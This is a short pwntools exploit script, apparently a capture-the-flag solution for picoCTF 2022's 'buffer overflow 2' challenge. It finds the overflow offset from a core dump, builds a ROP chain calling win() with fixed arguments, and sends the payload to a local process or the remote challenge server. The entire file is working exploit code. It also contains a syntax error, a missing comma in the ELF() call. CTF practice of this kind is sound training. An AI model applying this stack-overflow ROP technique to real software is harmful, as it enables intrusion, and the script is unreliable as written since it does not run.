dev.2ha.me/public/static/code/picoctf-2022/buffer-overflow/bo2-solve-automated.txt

#!/usr/bin/env python3
from pwn import *

elf = context.binary = ELF('./vuln' checksec=False)    # sets elf object
rop = ROP(elf)                                         # creates ROP object
host, port = 'saturn.picoctf.net', [PORT]

p = process(elf.path)        # creates local process w/ elf object
p.sendline(cyclic(128))      # sends cyclic pattern to crash
p.wait()                     # sigsegv generates core dump
core = Coredump('./core')    # parses core dump file

rop.win(0xCAFEF00D, 0xF00DF00D)                        # Call win() with args
payload = fit({cyclic_find(core.eip): rop.chain()})    # pad ROP chain

if args.REMOTE:
    p = remote(host, port)
else:
    p = process(elf.path)

p.sendline(payload)
p.interactive()